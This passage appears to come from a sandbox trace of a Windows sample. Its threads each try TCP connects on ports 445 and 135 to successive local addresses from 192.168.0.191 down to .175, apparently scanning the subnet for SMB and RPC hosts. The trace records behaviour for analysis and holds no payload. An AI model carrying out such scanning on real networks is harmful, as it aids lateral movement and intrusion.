exceptfds=0x8e2fe10, timeout=0x8e2ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x8e2fd08, exceptfds=0x8e2fe10) returned 0 [0096.121] closesocket (s=0xa1c) returned 0 [0096.122] inet_addr (cp="192.168.0.191") returned 0xbf00a8c0 [0096.122] htons (hostshort=0x87) returned 0x8700 [0096.122] socket (af=2, type=1, protocol=6) returned 0xa1c [0096.122] ioctlsocket (in: s=0xa1c, cmd=-2147195266, argp=0x8e2ff34 | out: argp=0x8e2ff34) returned 0 [0096.122] connect (s=0xa1c, name=0x8e2ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.191"), namelen=16) returned -1 [0096.122] WSAGetLastError () returned 10035 [0096.122] select (in: nfds=0, readfds=0x0, writefds=0x8e2fd08, exceptfds=0x8e2fe10, timeout=0x8e2ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x8e2fd08, exceptfds=0x8e2fe10) returned 0 [0101.143] closesocket (s=0xa1c) returned 0 [0101.144] RtlExitUserThread (Status=0x0) Thread: id = 123 os_tid = 0x5d8 [0091.118] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073ac8 [0091.118] free (_Block=0x2073ac8) [0091.118] inet_addr (cp="192.168.0.190") returned 0xbe00a8c0 [0091.118] htons (hostshort=0x1bd) returned 0xbd01 [0091.118] socket (af=2, type=1, protocol=6) returned 0xa28 [0091.118] ioctlsocket (in: s=0xa28, cmd=-2147195266, argp=0x8f6ff34 | out: argp=0x8f6ff34) returned 0 [0091.118] connect (s=0xa28, name=0x8f6ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.190"), namelen=16) returned -1 [0091.119] WSAGetLastError () returned 10035 [0091.119] select (in: nfds=0, readfds=0x0, writefds=0x8f6fd08, exceptfds=0x8f6fe10, timeout=0x8f6ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x8f6fd08, exceptfds=0x8f6fe10) returned 0 [0096.122] closesocket (s=0xa28) returned 0 [0096.123] inet_addr (cp="192.168.0.190") returned 0xbe00a8c0 [0096.123] htons (hostshort=0x87) returned 0x8700 [0096.123] socket (af=2, type=1, protocol=6) returned 0xa28 [0096.123] ioctlsocket (in: s=0xa28, cmd=-2147195266, argp=0x8f6ff34 | out: argp=0x8f6ff34) returned 0 [0096.123] connect (s=0xa28, name=0x8f6ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.190"), namelen=16) returned -1 [0096.123] WSAGetLastError () returned 10035 [0096.123] select (in: nfds=0, readfds=0x0, writefds=0x8f6fd08, exceptfds=0x8f6fe10, timeout=0x8f6ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x8f6fd08, exceptfds=0x8f6fe10) returned 0 [0101.141] closesocket (s=0xa28) returned 0 [0101.142] RtlExitUserThread (Status=0x0) Thread: id = 124 os_tid = 0x6a8 [0091.119] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073aa0 [0091.119] free (_Block=0x2073aa0) [0091.119] inet_addr (cp="192.168.0.189") returned 0xbd00a8c0 [0091.119] htons (hostshort=0x1bd) returned 0xbd01 [0091.119] socket (af=2, type=1, protocol=6) returned 0xa34 [0091.119] ioctlsocket (in: s=0xa34, cmd=-2147195266, argp=0x90aff34 | out: argp=0x90aff34) returned 0 [0091.119] connect (s=0xa34, name=0x90aff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.189"), namelen=16) returned -1 [0091.120] WSAGetLastError () returned 10035 [0091.120] select (in: nfds=0, readfds=0x0, writefds=0x90afd08, exceptfds=0x90afe10, timeout=0x90aff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x90afd08, exceptfds=0x90afe10) returned 0 [0096.123] closesocket (s=0xa34) returned 0 [0096.124] inet_addr (cp="192.168.0.189") returned 0xbd00a8c0 [0096.124] htons (hostshort=0x87) returned 0x8700 [0096.124] socket (af=2, type=1, protocol=6) returned 0xa34 [0096.124] ioctlsocket (in: s=0xa34, cmd=-2147195266, argp=0x90aff34 | out: argp=0x90aff34) returned 0 [0096.124] connect (s=0xa34, name=0x90aff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.189"), namelen=16) returned -1 [0096.124] WSAGetLastError () returned 10035 [0096.124] select (in: nfds=0, readfds=0x0, writefds=0x90afd08, exceptfds=0x90afe10, timeout=0x90aff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x90afd08, exceptfds=0x90afe10) returned 0 [0101.140] closesocket (s=0xa34) returned 0 [0101.141] RtlExitUserThread (Status=0x0) Thread: id = 125 os_tid = 0x138 [0091.120] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073a78 [0091.120] free (_Block=0x2073a78) [0091.120] inet_addr (cp="192.168.0.188") returned 0xbc00a8c0 [0091.120] htons (hostshort=0x1bd) returned 0xbd01 [0091.120] socket (af=2, type=1, protocol=6) returned 0xa40 [0091.120] ioctlsocket (in: s=0xa40, cmd=-2147195266, argp=0x91eff34 | out: argp=0x91eff34) returned 0 [0091.121] connect (s=0xa40, name=0x91eff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.188"), namelen=16) returned -1 [0091.121] WSAGetLastError () returned 10035 [0091.121] select (in: nfds=0, readfds=0x0, writefds=0x91efd08, exceptfds=0x91efe10, timeout=0x91eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x91efd08, exceptfds=0x91efe10) returned 0 [0096.124] closesocket (s=0xa40) returned 0 [0096.125] inet_addr (cp="192.168.0.188") returned 0xbc00a8c0 [0096.125] htons (hostshort=0x87) returned 0x8700 [0096.125] socket (af=2, type=1, protocol=6) returned 0xa40 [0096.125] ioctlsocket (in: s=0xa40, cmd=-2147195266, argp=0x91eff34 | out: argp=0x91eff34) returned 0 [0096.125] connect (s=0xa40, name=0x91eff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.188"), namelen=16) returned -1 [0096.125] WSAGetLastError () returned 10035 [0096.125] select (in: nfds=0, readfds=0x0, writefds=0x91efd08, exceptfds=0x91efe10, timeout=0x91eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x91efd08, exceptfds=0x91efe10) returned 0 [0101.138] closesocket (s=0xa40) returned 0 [0101.139] RtlExitUserThread (Status=0x0) Thread: id = 126 os_tid = 0x410 [0091.123] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073a50 [0091.124] free (_Block=0x2073a50) [0091.124] inet_addr (cp="192.168.0.187") returned 0xbb00a8c0 [0091.124] htons (hostshort=0x1bd) returned 0xbd01 [0091.124] socket (af=2, type=1, protocol=6) returned 0xa4c [0091.124] ioctlsocket (in: s=0xa4c, cmd=-2147195266, argp=0x932ff34 | out: argp=0x932ff34) returned 0 [0091.124] connect (s=0xa4c, name=0x932ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.187"), namelen=16) returned -1 [0091.124] WSAGetLastError () returned 10035 [0091.124] select (in: nfds=0, readfds=0x0, writefds=0x932fd08, exceptfds=0x932fe10, timeout=0x932ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x932fd08, exceptfds=0x932fe10) returned 0 [0096.125] closesocket (s=0xa4c) returned 0 [0096.126] inet_addr (cp="192.168.0.187") returned 0xbb00a8c0 [0096.126] htons (hostshort=0x87) returned 0x8700 [0096.126] socket (af=2, type=1, protocol=6) returned 0xa4c [0096.126] ioctlsocket (in: s=0xa4c, cmd=-2147195266, argp=0x932ff34 | out: argp=0x932ff34) returned 0 [0096.126] connect (s=0xa4c, name=0x932ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.187"), namelen=16) returned -1 [0096.126] WSAGetLastError () returned 10035 [0096.126] select (in: nfds=0, readfds=0x0, writefds=0x932fd08, exceptfds=0x932fe10, timeout=0x932ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x932fd08, exceptfds=0x932fe10) returned 0 [0101.137] closesocket (s=0xa4c) returned 0 [0101.138] RtlExitUserThread (Status=0x0) Thread: id = 127 os_tid = 0x3d4 [0091.125] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073a28 [0091.125] free (_Block=0x2073a28) [0091.126] inet_addr (cp="192.168.0.186") returned 0xba00a8c0 [0091.126] htons (hostshort=0x1bd) returned 0xbd01 [0091.126] socket (af=2, type=1, protocol=6) returned 0xa58 [0091.126] ioctlsocket (in: s=0xa58, cmd=-2147195266, argp=0x946ff34 | out: argp=0x946ff34) returned 0 [0091.126] connect (s=0xa58, name=0x946ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.186"), namelen=16) returned -1 [0091.126] WSAGetLastError () returned 10035 [0091.126] select (in: nfds=0, readfds=0x0, writefds=0x946fd08, exceptfds=0x946fe10, timeout=0x946ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x946fd08, exceptfds=0x946fe10) returned 0 [0096.136] closesocket (s=0xa58) returned 0 [0096.137] inet_addr (cp="192.168.0.186") returned 0xba00a8c0 [0096.137] htons (hostshort=0x87) returned 0x8700 [0096.137] socket (af=2, type=1, protocol=6) returned 0xa58 [0096.137] ioctlsocket (in: s=0xa58, cmd=-2147195266, argp=0x946ff34 | out: argp=0x946ff34) returned 0 [0096.137] connect (s=0xa58, name=0x946ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.186"), namelen=16) returned -1 [0096.138] WSAGetLastError () returned 10035 [0096.138] select (in: nfds=0, readfds=0x0, writefds=0x946fd08, exceptfds=0x946fe10, timeout=0x946ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x946fd08, exceptfds=0x946fe10) returned 0 [0101.149] closesocket (s=0xa58) returned 0 [0101.150] RtlExitUserThread (Status=0x0) Thread: id = 128 os_tid = 0x544 [0091.150] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073a00 [0091.150] free (_Block=0x2073a00) [0091.150] inet_addr (cp="192.168.0.185") returned 0xb900a8c0 [0091.150] htons (hostshort=0x1bd) returned 0xbd01 [0091.150] socket (af=2, type=1, protocol=6) returned 0xa64 [0091.158] ioctlsocket (in: s=0xa64, cmd=-2147195266, argp=0x95aff34 | out: argp=0x95aff34) returned 0 [0091.158] connect (s=0xa64, name=0x95aff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.185"), namelen=16) returned -1 [0091.159] WSAGetLastError () returned 10035 [0091.159] select (in: nfds=0, readfds=0x0, writefds=0x95afd08, exceptfds=0x95afe10, timeout=0x95aff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x95afd08, exceptfds=0x95afe10) returned 0 [0096.297] closesocket (s=0xa64) returned 0 [0096.298] inet_addr (cp="192.168.0.185") returned 0xb900a8c0 [0096.298] htons (hostshort=0x87) returned 0x8700 [0096.298] socket (af=2, type=1, protocol=6) returned 0xa64 [0096.298] ioctlsocket (in: s=0xa64, cmd=-2147195266, argp=0x95aff34 | out: argp=0x95aff34) returned 0 [0096.298] connect (s=0xa64, name=0x95aff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.185"), namelen=16) returned -1 [0096.298] WSAGetLastError () returned 10035 [0096.298] select (in: nfds=0, readfds=0x0, writefds=0x95afd08, exceptfds=0x95afe10, timeout=0x95aff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x95afd08, exceptfds=0x95afe10) returned 0 [0101.390] closesocket (s=0xa64) returned 0 [0101.397] RtlExitUserThread (Status=0x0) Thread: id = 129 os_tid = 0x710 [0091.161] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x20739d8 [0091.161] free (_Block=0x20739d8) [0091.161] inet_addr (cp="192.168.0.184") returned 0xb800a8c0 [0091.161] htons (hostshort=0x1bd) returned 0xbd01 [0091.161] socket (af=2, type=1, protocol=6) returned 0xa70 [0091.163] ioctlsocket (in: s=0xa70, cmd=-2147195266, argp=0x96eff34 | out: argp=0x96eff34) returned 0 [0091.163] connect (s=0xa70, name=0x96eff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.184"), namelen=16) returned -1 [0091.165] WSAGetLastError () returned 10035 [0091.165] select (in: nfds=0, readfds=0x0, writefds=0x96efd08, exceptfds=0x96efe10, timeout=0x96eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x96efd08, exceptfds=0x96efe10) returned 0 [0096.296] closesocket (s=0xa70) returned 0 [0096.296] inet_addr (cp="192.168.0.184") returned 0xb800a8c0 [0096.297] htons (hostshort=0x87) returned 0x8700 [0096.297] socket (af=2, type=1, protocol=6) returned 0xa70 [0096.297] ioctlsocket (in: s=0xa70, cmd=-2147195266, argp=0x96eff34 | out: argp=0x96eff34) returned 0 [0096.297] connect (s=0xa70, name=0x96eff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.184"), namelen=16) returned -1 [0096.297] WSAGetLastError () returned 10035 [0096.297] select (in: nfds=0, readfds=0x0, writefds=0x96efd08, exceptfds=0x96efe10, timeout=0x96eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x96efd08, exceptfds=0x96efe10) returned 0 [0101.389] closesocket (s=0xa70) returned 0 [0101.389] RtlExitUserThread (Status=0x0) Thread: id = 130 os_tid = 0x69c [0091.165] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x20739b0 [0091.165] free (_Block=0x20739b0) [0091.165] inet_addr (cp="192.168.0.183") returned 0xb700a8c0 [0091.165] htons (hostshort=0x1bd) returned 0xbd01 [0091.165] socket (af=2, type=1, protocol=6) returned 0xa7c [0091.165] ioctlsocket (in: s=0xa7c, cmd=-2147195266, argp=0x982ff34 | out: argp=0x982ff34) returned 0 [0091.165] connect (s=0xa7c, name=0x982ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.183"), namelen=16) returned -1 [0091.166] WSAGetLastError () returned 10035 [0091.166] select (in: nfds=0, readfds=0x0, writefds=0x982fd08, exceptfds=0x982fe10, timeout=0x982ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x982fd08, exceptfds=0x982fe10) returned 0 [0096.294] closesocket (s=0xa7c) returned 0 [0096.295] inet_addr (cp="192.168.0.183") returned 0xb700a8c0 [0096.295] htons (hostshort=0x87) returned 0x8700 [0096.295] socket (af=2, type=1, protocol=6) returned 0xa7c [0096.295] ioctlsocket (in: s=0xa7c, cmd=-2147195266, argp=0x982ff34 | out: argp=0x982ff34) returned 0 [0096.296] connect (s=0xa7c, name=0x982ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.183"), namelen=16) returned -1 [0096.296] WSAGetLastError () returned 10035 [0096.296] select (in: nfds=0, readfds=0x0, writefds=0x982fd08, exceptfds=0x982fe10, timeout=0x982ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x982fd08, exceptfds=0x982fe10) returned 0 [0101.387] closesocket (s=0xa7c) returned 0 [0101.388] RtlExitUserThread (Status=0x0) Thread: id = 131 os_tid = 0x500 [0091.172] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073988 [0091.172] free (_Block=0x2073988) [0091.172] inet_addr (cp="192.168.0.182") returned 0xb600a8c0 [0091.172] htons (hostshort=0x1bd) returned 0xbd01 [0091.172] socket (af=2, type=1, protocol=6) returned 0xa88 [0091.172] ioctlsocket (in: s=0xa88, cmd=-2147195266, argp=0x996ff34 | out: argp=0x996ff34) returned 0 [0091.172] connect (s=0xa88, name=0x996ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.182"), namelen=16) returned -1 [0091.173] WSAGetLastError () returned 10035 [0091.173] select (in: nfds=0, readfds=0x0, writefds=0x996fd08, exceptfds=0x996fe10, timeout=0x996ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x996fd08, exceptfds=0x996fe10) returned 0 [0096.310] closesocket (s=0xa88) returned 0 [0096.311] inet_addr (cp="192.168.0.182") returned 0xb600a8c0 [0096.311] htons (hostshort=0x87) returned 0x8700 [0096.311] socket (af=2, type=1, protocol=6) returned 0xa88 [0096.311] ioctlsocket (in: s=0xa88, cmd=-2147195266, argp=0x996ff34 | out: argp=0x996ff34) returned 0 [0096.311] connect (s=0xa88, name=0x996ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.182"), namelen=16) returned -1 [0096.311] WSAGetLastError () returned 10035 [0096.311] select (in: nfds=0, readfds=0x0, writefds=0x996fd08, exceptfds=0x996fe10, timeout=0x996ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x996fd08, exceptfds=0x996fe10) returned 0 [0101.409] closesocket (s=0xa88) returned 0 [0101.410] RtlExitUserThread (Status=0x0) Thread: id = 132 os_tid = 0x330 [0091.174] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073960 [0091.174] free (_Block=0x2073960) [0091.174] inet_addr (cp="192.168.0.181") returned 0xb500a8c0 [0091.174] htons (hostshort=0x1bd) returned 0xbd01 [0091.174] socket (af=2, type=1, protocol=6) returned 0xa94 [0091.174] ioctlsocket (in: s=0xa94, cmd=-2147195266, argp=0x9aaff34 | out: argp=0x9aaff34) returned 0 [0091.174] connect (s=0xa94, name=0x9aaff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.181"), namelen=16) returned -1 [0091.175] WSAGetLastError () returned 10035 [0091.175] select (in: nfds=0, readfds=0x0, writefds=0x9aafd08, exceptfds=0x9aafe10, timeout=0x9aaff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x9aafd08, exceptfds=0x9aafe10) returned 0 [0096.309] closesocket (s=0xa94) returned 0 [0096.309] inet_addr (cp="192.168.0.181") returned 0xb500a8c0 [0096.310] htons (hostshort=0x87) returned 0x8700 [0096.310] socket (af=2, type=1, protocol=6) returned 0xa94 [0096.310] ioctlsocket (in: s=0xa94, cmd=-2147195266, argp=0x9aaff34 | out: argp=0x9aaff34) returned 0 [0096.310] connect (s=0xa94, name=0x9aaff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.181"), namelen=16) returned -1 [0096.310] WSAGetLastError () returned 10035 [0096.310] select (in: nfds=0, readfds=0x0, writefds=0x9aafd08, exceptfds=0x9aafe10, timeout=0x9aaff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x9aafd08, exceptfds=0x9aafe10) returned 0 [0101.408] closesocket (s=0xa94) returned 0 [0101.409] RtlExitUserThread (Status=0x0) Thread: id = 133 os_tid = 0x348 [0091.175] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073938 [0091.175] free (_Block=0x2073938) [0091.175] inet_addr (cp="192.168.0.180") returned 0xb400a8c0 [0091.175] htons (hostshort=0x1bd) returned 0xbd01 [0091.175] socket (af=2, type=1, protocol=6) returned 0xaa0 [0091.176] ioctlsocket (in: s=0xaa0, cmd=-2147195266, argp=0x9beff34 | out: argp=0x9beff34) returned 0 [0091.176] connect (s=0xaa0, name=0x9beff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.180"), namelen=16) returned -1 [0091.176] WSAGetLastError () returned 10035 [0091.176] select (in: nfds=0, readfds=0x0, writefds=0x9befd08, exceptfds=0x9befe10, timeout=0x9beff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x9befd08, exceptfds=0x9befe10) returned 0 [0096.307] closesocket (s=0xaa0) returned 0 [0096.308] inet_addr (cp="192.168.0.180") returned 0xb400a8c0 [0096.308] htons (hostshort=0x87) returned 0x8700 [0096.308] socket (af=2, type=1, protocol=6) returned 0xaa0 [0096.308] ioctlsocket (in: s=0xaa0, cmd=-2147195266, argp=0x9beff34 | out: argp=0x9beff34) returned 0 [0096.308] connect (s=0xaa0, name=0x9beff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.180"), namelen=16) returned -1 [0096.309] WSAGetLastError () returned 10035 [0096.309] select (in: nfds=0, readfds=0x0, writefds=0x9befd08, exceptfds=0x9befe10, timeout=0x9beff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x9befd08, exceptfds=0x9befe10) returned 0 [0101.407] closesocket (s=0xaa0) returned 0 [0101.407] RtlExitUserThread (Status=0x0) Thread: id = 134 os_tid = 0xc04 [0091.177] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073910 [0091.177] free (_Block=0x2073910) [0091.177] inet_addr (cp="192.168.0.179") returned 0xb300a8c0 [0091.177] htons (hostshort=0x1bd) returned 0xbd01 [0091.177] socket (af=2, type=1, protocol=6) returned 0xaac [0091.177] ioctlsocket (in: s=0xaac, cmd=-2147195266, argp=0x9d2ff34 | out: argp=0x9d2ff34) returned 0 [0091.177] connect (s=0xaac, name=0x9d2ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.179"), namelen=16) returned -1 [0091.178] WSAGetLastError () returned 10035 [0091.178] select (in: nfds=0, readfds=0x0, writefds=0x9d2fd08, exceptfds=0x9d2fe10, timeout=0x9d2ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x9d2fd08, exceptfds=0x9d2fe10) returned 0 [0096.306] closesocket (s=0xaac) returned 0 [0096.307] inet_addr (cp="192.168.0.179") returned 0xb300a8c0 [0096.307] htons (hostshort=0x87) returned 0x8700 [0096.307] socket (af=2, type=1, protocol=6) returned 0xaac [0096.307] ioctlsocket (in: s=0xaac, cmd=-2147195266, argp=0x9d2ff34 | out: argp=0x9d2ff34) returned 0 [0096.307] connect (s=0xaac, name=0x9d2ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.179"), namelen=16) returned -1 [0096.307] WSAGetLastError () returned 10035 [0096.307] select (in: nfds=0, readfds=0x0, writefds=0x9d2fd08, exceptfds=0x9d2fe10, timeout=0x9d2ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x9d2fd08, exceptfds=0x9d2fe10) returned 0 [0101.405] closesocket (s=0xaac) returned 0 [0101.406] RtlExitUserThread (Status=0x0) Thread: id = 135 os_tid = 0xc08 [0091.179] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x20738e8 [0091.179] free (_Block=0x20738e8) [0091.179] inet_addr (cp="192.168.0.178") returned 0xb200a8c0 [0091.179] htons (hostshort=0x1bd) returned 0xbd01 [0091.179] socket (af=2, type=1, protocol=6) returned 0xab8 [0091.180] ioctlsocket (in: s=0xab8, cmd=-2147195266, argp=0x9e6ff34 | out: argp=0x9e6ff34) returned 0 [0091.180] connect (s=0xab8, name=0x9e6ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.178"), namelen=16) returned -1 [0091.180] WSAGetLastError () returned 10035 [0091.180] select (in: nfds=0, readfds=0x0, writefds=0x9e6fd08, exceptfds=0x9e6fe10, timeout=0x9e6ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x9e6fd08, exceptfds=0x9e6fe10) returned 0 [0096.304] closesocket (s=0xab8) returned 0 [0096.305] inet_addr (cp="192.168.0.178") returned 0xb200a8c0 [0096.305] htons (hostshort=0x87) returned 0x8700 [0096.305] socket (af=2, type=1, protocol=6) returned 0xab8 [0096.305] ioctlsocket (in: s=0xab8, cmd=-2147195266, argp=0x9e6ff34 | out: argp=0x9e6ff34) returned 0 [0096.305] connect (s=0xab8, name=0x9e6ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.178"), namelen=16) returned -1 [0096.306] WSAGetLastError () returned 10035 [0096.306] select (in: nfds=0, readfds=0x0, writefds=0x9e6fd08, exceptfds=0x9e6fe10, timeout=0x9e6ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x9e6fd08, exceptfds=0x9e6fe10) returned 0 [0101.404] closesocket (s=0xab8) returned 0 [0101.404] RtlExitUserThread (Status=0x0) Thread: id = 136 os_tid = 0xc0c [0091.181] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x20738c0 [0091.181] free (_Block=0x20738c0) [0091.181] inet_addr (cp="192.168.0.177") returned 0xb100a8c0 [0091.181] htons (hostshort=0x1bd) returned 0xbd01 [0091.181] socket (af=2, type=1, protocol=6) returned 0xac4 [0091.181] ioctlsocket (in: s=0xac4, cmd=-2147195266, argp=0x9faff34 | out: argp=0x9faff34) returned 0 [0091.181] connect (s=0xac4, name=0x9faff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.177"), namelen=16) returned -1 [0091.182] WSAGetLastError () returned 10035 [0091.182] select (in: nfds=0, readfds=0x0, writefds=0x9fafd08, exceptfds=0x9fafe10, timeout=0x9faff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x9fafd08, exceptfds=0x9fafe10) returned 0 [0096.303] closesocket (s=0xac4) returned 0 [0096.303] inet_addr (cp="192.168.0.177") returned 0xb100a8c0 [0096.303] htons (hostshort=0x87) returned 0x8700 [0096.303] socket (af=2, type=1, protocol=6) returned 0xac4 [0096.304] ioctlsocket (in: s=0xac4, cmd=-2147195266, argp=0x9faff34 | out: argp=0x9faff34) returned 0 [0096.304] connect (s=0xac4, name=0x9faff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.177"), namelen=16) returned -1 [0096.304] WSAGetLastError () returned 10035 [0096.304] select (in: nfds=0, readfds=0x0, writefds=0x9fafd08, exceptfds=0x9fafe10, timeout=0x9faff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x9fafd08, exceptfds=0x9fafe10) returned 0 [0101.403] closesocket (s=0xac4) returned 0 [0101.403] RtlExitUserThread (Status=0x0) Thread: id = 137 os_tid = 0xc10 [0091.182] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073898 [0091.182] free (_Block=0x2073898) [0091.182] inet_addr (cp="192.168.0.176") returned 0xb000a8c0 [0091.182] htons (hostshort=0x1bd) returned 0xbd01 [0091.182] socket (af=2, type=1, protocol=6) returned 0xad0 [0091.183] ioctlsocket (in: s=0xad0, cmd=-2147195266, argp=0xa0eff34 | out: argp=0xa0eff34) returned 0 [0091.183] connect (s=0xad0, name=0xa0eff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.176"), namelen=16) returned -1 [0091.183] WSAGetLastError () returned 10035 [0091.183] select (in: nfds=0, readfds=0x0, writefds=0xa0efd08, exceptfds=0xa0efe10, timeout=0xa0eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xa0efd08, exceptfds=0xa0efe10) returned 0 [0096.301] closesocket (s=0xad0) returned 0 [0096.302] inet_addr (cp="192.168.0.176") returned 0xb000a8c0 [0096.302] htons (hostshort=0x87) returned 0x8700 [0096.302] socket (af=2, type=1, protocol=6) returned 0xad0 [0096.302] ioctlsocket (in: s=0xad0, cmd=-2147195266, argp=0xa0eff34 | out: argp=0xa0eff34) returned 0 [0096.302] connect (s=0xad0, name=0xa0eff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.176"), namelen=16) returned -1 [0096.302] WSAGetLastError () returned 10035 [0096.302] select (in: nfds=0, readfds=0x0, writefds=0xa0efd08, exceptfds=0xa0efe10, timeout=0xa0eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xa0efd08, exceptfds=0xa0efe10) returned 0 [0101.401] closesocket (s=0xad0) returned 0 [0101.402] RtlExitUserThread (Status=0x0) Thread: id = 138 os_tid = 0xc14 [0091.183] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073870 [0091.184] free (_Block=0x2073870) [0091.184] inet_addr (cp="192.168.0.175") returned 0xaf00a8c0 [0091.184] htons (hostshort=0x1bd) returned 0xbd01 [0091.184] socket (af=2, type=1, protocol=6) returned 0xadc [0091.184] ioctlsocket (in: s=0xadc, cmd=-2147195266, argp=0xa22ff34 | out: argp=0xa22ff34) returned 0 [0091.184] connect (s=0xadc, name=0xa22ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.175"), namelen=16) returned -1 [0091.184] WSAGetLastError () returned 10035 [0091.185] select (in: nfds=0, readfds=0x0, writefds=0xa22fd08, exceptfds=0xa22fe10, timeout=0xa22ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xa22fd08, exceptfds=0xa22fe10) returned 0 [0096.300] closesocket (s=0xadc) returned 0 [0096.301] inet_addr (cp="192.168.0.175") returned 0xaf00a8c0 [0096.301] htons (hostshort=0x87) returned 0x8700 [0096.301] socket (af=2, type=1, protocol=6) returned 0xadc [0096.301] ioctlsocket (in: s=0xadc, cmd=-2147195266, argp=0xa22ff34 | out: argp=0xa22ff34) returned 0 [0096.301] connect (s=0xadc, name=0xa22ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.175"), namelen=16) returned -1 [0096.301] WSAGetLastError () returned 10035 [0096.301] select (in: nfds=0, readfds=0x0, writefds=0xa22fd08, exceptfds=0xa22fe10, timeout=0xa22ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, 